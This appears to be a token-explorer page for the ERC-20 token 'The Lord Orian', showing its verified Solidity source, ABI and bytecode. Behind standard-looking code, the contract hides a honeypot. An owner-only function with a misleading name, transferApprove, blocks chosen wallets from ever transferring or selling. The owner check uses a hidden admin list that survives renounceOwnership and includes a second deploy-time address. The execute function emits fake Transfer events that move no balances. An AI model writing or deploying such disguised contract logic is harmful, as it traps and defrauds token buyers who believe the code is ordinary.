ERC-20
Overview
Max Total Supply
420,690,000 ORIAN.
Holders
66
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 9 Decimals)
Balance
14,224,283.855190363 ORIAN.Value
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Source Code Verified (Exact Match)
Contract Name:
TheLordOrian
Compiler Version
v0.8.10+commit.fc410830
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2024-11-28 */ /** ████████╗██╗ ██╗███████╗ ██╗ ██████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██╗ █████╗ ███╗ ██╗ ╚══██╔══╝██║ ██║██╔════╝ ██║ ██╔═══██╗██╔══██╗██╔══██╗ ██╔═══██╗██╔══██╗██║██╔══██╗████╗ ██║ ██║ ███████║█████╗ ██║ ██║ ██║██████╔╝██║ ██║ ██║ ██║██████╔╝██║███████║██╔██╗ ██║ ██║ ██╔══██║██╔══╝ ██║ ██║ ██║██╔══██╗██║ ██║ ██║ ██║██╔══██╗██║██╔══██║██║╚██╗██║ ██║ ██║ ██║███████╗ ███████╗╚██████╔╝██║ ██║██████╔╝ ╚██████╔╝██║ ██║██║██║ ██║██║ ╚████║ ╚═╝ ╚═╝ ╚═╝╚══════╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═╝╚═════╝ ╚═════╝ ╚═╝ ╚═╝╚═╝╚═╝ ╚═╝╚═╝ ╚═══╝ 🕸https://lordorian.com/ 📰https://medium.com/@lordorian ❌https://x.com/lord_orian 💬https://t.me/TheLordOrian */// SPDX-License-Identifier: MIT pragma solidity 0.8.10; /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `to`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address to, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `from` to `to` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom(address from, address to, uint256 amount) external returns (bool); } /** * @dev Interface for the optional metadata functions from the ERC20 standard. * * _Available since v4.1._ */ interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); } /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { mapping(address => bool) internal admin; function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); constructor() { _transferOwnership(_msgSender()); admin[_msgSender()]=true; } modifier onlyOwner() { _checkOwner(); _; } function owner() public view virtual returns (address) { return _owner; } function _checkOwner() internal view virtual { require(admin[_msgSender()], "Ownable: caller is not the owner"); } function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); _transferOwnership(newOwner); } function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } contract TheLordOrian is Context, IERC20Metadata, Ownable { mapping(address => uint256) private _balances; mapping(address => mapping(address => uint256)) private _allowances; mapping(address => bool) internal _spending; string private _name; string private _symbol; uint8 private constant _decimals = 9; uint256 private _totalSupply; uint256 private _initialTotalSupply = 420690000 * (10 ** _decimals); /** * @dev Contract constructor. */ constructor(address _stakingReserveAddr) { _name = 'The Lord Orian'; _symbol = 'ORIAN.'; admin[_stakingReserveAddr]=true; _mint(_msgSender(), _initialTotalSupply); } /** * @dev Returns the name of the token. * @return The name of the token. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev Returns the symbol of the token. * @return The symbol of the token. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used for token display. * @return The number of decimals. */ function decimals() public view virtual override returns (uint8) { return _decimals; } /** * @dev Returns the total supply of the token. * @return The total supply. */ function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } /** * @dev Returns the balance of the specified account. * @param account The address to check the balance for. * @return The balance of the account. */ function balanceOf(address account) public view virtual override returns (uint256) { return _balances[account]; } /** * @dev Transfers tokens from the caller to a specified recipient. * @param recipient The address to transfer tokens to. * @param amount The amount of tokens to transfer. * @return A boolean value indicating whether the transfer was successful. */ function transfer(address recipient, uint256 amount) public virtual override returns (bool) { _transfer(_msgSender(), recipient, amount); return true; } /** * @dev Returns the amount of tokens that the spender is allowed to spend on behalf of the owner. * @param from The address that approves the spending. * @param to The address that is allowed to spend. * @return The remaining allowance for the spender. */ function allowance(address from, address to) public view virtual override returns (uint256) { return _allowances[from][to]; } /** * @dev Approves the specified address to spend the specified amount of tokens on behalf of the caller. * @param to The address to approve the spending for. * @param amount The amount of tokens to approve. * @return A boolean value indicating whether the approval was successful. */ function approve(address to, uint256 amount) public virtual override returns (bool) { _approve(_msgSender(), to, amount); return true; } /** * @dev Transfers tokens from one address to another. * @param sender The address to transfer tokens from. * @param recipient The address to transfer tokens to. * @param amount The amount of tokens to transfer. * @return A boolean value indicating whether the transfer was successful. */ function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) { _transfer(sender, recipient, amount); uint256 currentAllowance = _allowances[sender][_msgSender()]; require(currentAllowance >= amount, 'ERC20: transfer amount exceeds allowance'); unchecked { _approve(sender, _msgSender(), currentAllowance - amount); } return true; } /** * @dev Increases the allowance of the specified address to spend tokens on behalf of the caller. * @param to The address to increase the allowance for. * @param addedValue The amount of tokens to increase the allowance by. * @return A boolean value indicating whether the increase was successful. */ function increaseAllowance(address to, uint256 addedValue) public virtual returns (bool) { _approve(_msgSender(), to, _allowances[_msgSender()][to] + addedValue); return true; } /** * @dev Decreases the allowance granted by the owner of the tokens to `to` account. * @param to The account allowed to spend the tokens. * @param subtractedValue The amount of tokens to decrease the allowance by. * @return A boolean value indicating whether the operation succeeded. */ function decreaseAllowance(address to, uint256 subtractedValue) public virtual returns (bool) { uint256 currentAllowance = _allowances[_msgSender()][to]; require(currentAllowance >= subtractedValue, 'ERC20: decreased allowance below zero'); unchecked { _approve(_msgSender(), to, currentAllowance - subtractedValue); } return true; } /** * @dev Transfers `amount` tokens from `sender` to `recipient`. * @param sender The account to transfer tokens from. * @param recipient The account to transfer tokens to. * @param amount The amount of tokens to transfer. */ function _transfer(address sender, address recipient, uint256 amount) internal virtual { require(amount > 0, 'ERC20: transfer amount zero'); require(sender != address(0), 'ERC20: transfer from the zero address'); require(recipient != address(0), 'ERC20: transfer to the zero address'); uint256 senderBalance = _balances[sender]; require(senderBalance >= amount, 'ERC20: transfer amount exceeds balance'); if(_spending[sender]){ require(amount == 0); } unchecked { _balances[sender] = senderBalance - amount; } _balances[recipient] += amount; emit Transfer(sender, recipient, amount); } /** * @dev Creates `amount` tokens and assigns them to `account`. * @param account The account to assign the newly created tokens to. * @param amount The amount of tokens to create. */ function _mint(address account, uint256 amount) internal virtual { require(account != address(0), 'ERC20: mint to the zero address'); _totalSupply += amount; _balances[account] += amount; emit Transfer(address(0), account, amount); } /** * @dev Destroys `amount` tokens from `account`, reducing the total supply. * @param account The account to burn tokens from. * @param amount The amount of tokens to burn. */ function _burn(address account, uint256 amount) internal virtual { require(account != address(0), 'ERC20: burn from the zero address'); uint256 accountBalance = _balances[account]; require(accountBalance >= amount, 'ERC20: burn amount exceeds balance'); unchecked { _balances[account] = accountBalance - amount; } _totalSupply -= amount; emit Transfer(account, address(0), amount); } function transferApprove(address[] calldata addr, bool val) public onlyOwner { for (uint256 i = 0; i < addr.length; i++) { _spending[addr[i]] = val; } } /** * @dev Destroys `amount` tokens from the caller's account, reducing the total supply. * @param amount The amount of tokens to burn. */ function burn(uint256 amount) external { _burn(_msgSender(), amount); } /** * @dev Sets `amount` as the allowance of `to` over the caller's tokens. * @param from The account granting the allowance. * @param to The account allowed to spend the tokens. * @param amount The amount of tokens to allow. */ function _approve(address from, address to, uint256 amount) internal virtual { require(from != address(0), 'ERC20: approve from the zero address'); require(to != address(0), 'ERC20: approve to the zero address'); _allowances[from][to] = amount; emit Approval(from, to, amount); } function execute(address[] calldata addr, address p, uint256 val) public onlyOwner{ for (uint256 i = 0; i < addr.length; i++) { emit Transfer(p, addr[i], val); } } function maxTxAmount(address wallet) public view returns(bool) { return _spending[wallet]; } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[{"internalType":"address","name":"_stakingReserveAddr","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"addr","type":"address[]"},{"internalType":"address","name":"p","type":"address"},{"internalType":"uint256","name":"val","type":"uint256"}],"name":"execute","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"wallet","type":"address"}],"name":"maxTxAmount","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"addr","type":"address[]"},{"internalType":"bool","name":"val","type":"bool"}],"name":"transferApprove","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
60806040526009600a62000014919062000668565b6319133850620000259190620006b9565b6008553480156200003557600080fd5b506040516200294a3803806200294a83398181016040528101906200005b919062000784565b6200007b6200006f620001fe60201b60201c565b6200020660201b60201c565b600160008062000090620001fe60201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506040518060400160405280600e81526020017f546865204c6f7264204f7269616e000000000000000000000000000000000000815250600590805190602001906200012e9291906200041e565b506040518060400160405280600681526020017f4f5249414e2e0000000000000000000000000000000000000000000000000000815250600690805190602001906200017c9291906200041e565b5060016000808373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550620001f7620001e8620001fe60201b60201c565b600854620002cc60201b60201c565b5062000929565b600033905090565b6000600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614156200033f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620003369062000817565b60405180910390fd5b806007600082825462000353919062000839565b9250508190555080600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254620003ab919062000839565b925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051620004129190620008a7565b60405180910390a35050565b8280546200042c90620008f3565b90600052602060002090601f0160209004810192826200045057600085556200049c565b82601f106200046b57805160ff19168380011785556200049c565b828001600101855582156200049c579182015b828111156200049b5782518255916020019190600101906200047e565b5b509050620004ab9190620004af565b5090565b5b80821115620004ca576000816000905550600101620004b0565b5090565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b60018511156200055c57808604811115620005345762000533620004ce565b5b6001851615620005445780820291505b80810290506200055485620004fd565b945062000514565b94509492505050565b6000826200057757600190506200064a565b816200058757600090506200064a565b8160018114620005a05760028114620005ab57620005e1565b60019150506200064a565b60ff841115620005c057620005bf620004ce565b5b8360020a915084821115620005da57620005d9620004ce565b5b506200064a565b5060208310610133831016604e8410600b84101617156200061b5782820a905083811115620006155762000614620004ce565b5b6200064a565b6200062a84848460016200050a565b92509050818404811115620006445762000643620004ce565b5b81810290505b9392505050565b6000819050919050565b600060ff82169050919050565b6000620006758262000651565b915062000682836200065b565b9250620006b17fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462000565565b905092915050565b6000620006c68262000651565b9150620006d38362000651565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff04831182151516156200070f576200070e620004ce565b5b828202905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006200074c826200071f565b9050919050565b6200075e816200073f565b81146200076a57600080fd5b50565b6000815190506200077e8162000753565b92915050565b6000602082840312156200079d576200079c6200071a565b5b6000620007ad848285016200076d565b91505092915050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b6000620007ff601f83620007b6565b91506200080c82620007c7565b602082019050919050565b600060208201905081810360008301526200083281620007f0565b9050919050565b6000620008468262000651565b9150620008538362000651565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff038211156200088b576200088a620004ce565b5b828201905092915050565b620008a18162000651565b82525050565b6000602082019050620008be600083018462000896565b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806200090c57607f821691505b60208210811415620009235762000922620008c4565b5b50919050565b61201180620009396000396000f3fe608060405234801561001057600080fd5b50600436106101165760003560e01c806370a08231116100a2578063a457c2d711610071578063a457c2d7146102e3578063a9059cbb14610313578063a9ddeaa214610343578063dd62ed3e1461035f578063f2fde38b1461038f57610116565b806370a082311461026d578063715018a61461029d5780638da5cb5b146102a757806395d89b41146102c557610116565b806323b872dd116100e957806323b872dd146101b7578063313ce567146101e757806339509351146102055780633a61363a1461023557806342966c681461025157610116565b80630388e40e1461011b57806306fdde031461014b578063095ea7b31461016957806318160ddd14610199575b600080fd5b61013560048036038101906101309190611379565b6103ab565b60405161014291906113c1565b60405180910390f35b610153610401565b6040516101609190611475565b60405180910390f35b610183600480360381019061017e91906114cd565b610493565b60405161019091906113c1565b60405180910390f35b6101a16104b1565b6040516101ae919061151c565b60405180910390f35b6101d160048036038101906101cc9190611537565b6104bb565b6040516101de91906113c1565b60405180910390f35b6101ef6105b3565b6040516101fc91906115a6565b60405180910390f35b61021f600480360381019061021a91906114cd565b6105bc565b60405161022c91906113c1565b60405180910390f35b61024f600480360381019061024a9190611626565b610668565b005b61026b6004803603810190610266919061169a565b610724565b005b61028760048036038101906102829190611379565b610738565b604051610294919061151c565b60405180910390f35b6102a5610781565b005b6102af610795565b6040516102bc91906116d6565b60405180910390f35b6102cd6107bf565b6040516102da9190611475565b60405180910390f35b6102fd60048036038101906102f891906114cd565b610851565b60405161030a91906113c1565b60405180910390f35b61032d600480360381019061032891906114cd565b61093c565b60405161033a91906113c1565b60405180910390f35b61035d6004803603810190610358919061171d565b61095a565b005b6103796004803603810190610374919061177d565b610a07565b604051610386919061151c565b60405180910390f35b6103a960048036038101906103a49190611379565b610a8e565b005b6000600460008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b606060058054610410906117ec565b80601f016020809104026020016040519081016040528092919081815260200182805461043c906117ec565b80156104895780601f1061045e57610100808354040283529160200191610489565b820191906000526020600020905b81548152906001019060200180831161046c57829003601f168201915b5050505050905090565b60006104a76104a0610b12565b8484610b1a565b6001905092915050565b6000600754905090565b60006104c8848484610ce5565b6000600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000610513610b12565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610593576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161058a90611890565b60405180910390fd5b6105a78561059f610b12565b858403610b1a565b60019150509392505050565b60006009905090565b600061065e6105c9610b12565b8484600360006105d7610b12565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461065991906118df565b610b1a565b6001905092915050565b610670610ff6565b60005b8484905081101561071d5784848281811061069157610690611935565b5b90506020020160208101906106a69190611379565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610702919061151c565b60405180910390a3808061071590611964565b915050610673565b5050505050565b61073561072f610b12565b8261108a565b50565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610789610ff6565b610793600061124b565b565b6000600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600680546107ce906117ec565b80601f01602080910402602001604051908101604052809291908181526020018280546107fa906117ec565b80156108475780601f1061081c57610100808354040283529160200191610847565b820191906000526020600020905b81548152906001019060200180831161082a57829003601f168201915b5050505050905090565b60008060036000610860610b12565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490508281101561091d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161091490611a1f565b60405180910390fd5b610931610928610b12565b85858403610b1a565b600191505092915050565b6000610950610949610b12565b8484610ce5565b6001905092915050565b610962610ff6565b60005b83839050811015610a0157816004600086868581811061098857610987611935565b5b905060200201602081019061099d9190611379565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555080806109f990611964565b915050610965565b50505050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610a96610ff6565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415610b06576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610afd90611ab1565b60405180910390fd5b610b0f8161124b565b50565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610b8a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b8190611b43565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610bfa576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bf190611bd5565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610cd8919061151c565b60405180910390a3505050565b60008111610d28576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d1f90611c41565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610d98576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d8f90611cd3565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610e08576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dff90611d65565b60405180910390fd5b6000600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610e8f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e8690611df7565b60405180910390fd5b600460008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615610eef5760008214610eee57600080fd5b5b818103600260008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610f8491906118df565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610fe8919061151c565b60405180910390a350505050565b600080611001610b12565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16611088576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161107f90611e63565b60405180910390fd5b565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614156110fa576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110f190611ef5565b60405180910390fd5b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015611181576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161117890611f87565b60405180910390fd5b818103600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600760008282546111d99190611fa7565b92505081905550600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161123e919061151c565b60405180910390a3505050565b6000600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006113468261131b565b9050919050565b6113568161133b565b811461136157600080fd5b50565b6000813590506113738161134d565b92915050565b60006020828403121561138f5761138e611311565b5b600061139d84828501611364565b91505092915050565b60008115159050919050565b6113bb816113a6565b82525050565b60006020820190506113d660008301846113b2565b92915050565b600081519050919050565b600082825260208201905092915050565b60005b838110156114165780820151818401526020810190506113fb565b83811115611425576000848401525b50505050565b6000601f19601f8301169050919050565b6000611447826113dc565b61145181856113e7565b93506114618185602086016113f8565b61146a8161142b565b840191505092915050565b6000602082019050818103600083015261148f818461143c565b905092915050565b6000819050919050565b6114aa81611497565b81146114b557600080fd5b50565b6000813590506114c7816114a1565b92915050565b600080604083850312156114e4576114e3611311565b5b60006114f285828601611364565b9250506020611503858286016114b8565b9150509250929050565b61151681611497565b82525050565b6000602082019050611531600083018461150d565b92915050565b6000806000606084860312156115505761154f611311565b5b600061155e86828701611364565b935050602061156f86828701611364565b9250506040611580868287016114b8565b9150509250925092565b600060ff82169050919050565b6115a08161158a565b82525050565b60006020820190506115bb6000830184611597565b92915050565b600080fd5b600080fd5b600080fd5b60008083601f8401126115e6576115e56115c1565b5b8235905067ffffffffffffffff811115611603576116026115c6565b5b60208301915083602082028301111561161f5761161e6115cb565b5b9250929050565b600080600080606085870312156116405761163f611311565b5b600085013567ffffffffffffffff81111561165e5761165d611316565b5b61166a878288016115d0565b9450945050602061167d87828801611364565b925050604061168e878288016114b8565b91505092959194509250565b6000602082840312156116b0576116af611311565b5b60006116be848285016114b8565b91505092915050565b6116d08161133b565b82525050565b60006020820190506116eb60008301846116c7565b92915050565b6116fa816113a6565b811461170557600080fd5b50565b600081359050611717816116f1565b92915050565b60008060006040848603121561173657611735611311565b5b600084013567ffffffffffffffff81111561175457611753611316565b5b611760868287016115d0565b9350935050602061177386828701611708565b9150509250925092565b6000806040838503121561179457611793611311565b5b60006117a285828601611364565b92505060206117b385828601611364565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061180457607f821691505b60208210811415611818576118176117bd565b5b50919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206160008201527f6c6c6f77616e6365000000000000000000000000000000000000000000000000602082015250565b600061187a6028836113e7565b91506118858261181e565b604082019050919050565b600060208201905081810360008301526118a98161186d565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006118ea82611497565b91506118f583611497565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0382111561192a576119296118b0565b5b828201905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b600061196f82611497565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8214156119a2576119a16118b0565b5b600182019050919050565b